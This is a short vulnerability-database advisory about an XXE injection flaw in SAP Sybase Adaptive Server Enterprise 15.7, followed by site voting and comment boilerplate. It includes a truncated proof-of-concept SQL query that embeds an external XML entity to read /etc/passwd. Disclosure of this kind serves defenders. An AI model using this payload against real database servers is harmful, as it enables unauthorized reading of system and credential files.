SAP Sybase Adapter Server Enterprise XXE Injection

2015.11.26

Credit: Igor Bulatenko

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

SAP Sybase Adaptive Server Enterprise is prone to an information-disclosure vulnerability.
An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.
SAP Sybase Adaptive Server Enterprise 15.7 ESD 2 is vulnerable; other versions may also be affected.
SELECT xmlextract('/', xmlparse('<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/etc/passwd">]><content>&ab

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

SAP Sybase Adapter Server Enterprise XXE Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.